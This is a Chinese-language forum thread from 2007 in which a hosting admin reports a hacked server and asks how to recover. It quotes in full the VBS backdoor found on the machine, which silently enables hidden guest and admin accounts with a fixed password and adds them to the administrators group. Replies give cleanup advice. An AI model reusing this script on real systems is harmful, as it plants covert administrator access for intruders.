一台服务器中招了，苦恼中

小于

给朋友做了虚拟主机，开了ASP，被黑，估计是埋下了啥东西，IP是219.138.224.192，现在进MS-DOS方式会先运行一个VBS，我把它删除了，是个开权限的东西，直接运行CMD.EXE文件也是这样，但CMD.exe文件没有啥变化。

怎么恢复呢？

那个vbs的内容是

dim wsh
set wsh=CreateObject("WScript.Shell")
wsh.run "net user guest /active:yes",0
wsh.run "net user guest 125699",0
wsh.run "net localgroup administrators guest /add",0
wsh.run "net1 user admin /active:yes",0
wsh.run "net1 user admin 125699 /add",0
wsh.run "net1 localgroup administrators admin /add",0


好狠吖

wudizt

这个俺不懂了。只能帮小于顶一下了。:funk:

刀口

既然都这样，稳妥的办法还是重装吧。谁知道还有没有其它后门呢？

小于

重装工程太大了！！

wowh

用sreng扫了 放份log上来

不然很难分析啊

coolfax

我的做法是：把net.exe  net1.exe 的全部权限都去掉，黑客就无法使用这2个命令了

然后卸载Windows Script ，这样VBS也不能运行了

雨夜咖啡

辛苦了 老大

softworm

原帖由 wowh 于 2007-7-15 20:46 发表
用sreng扫了 放份log上来

不然很难分析啊

正想这么回呢，详见我签名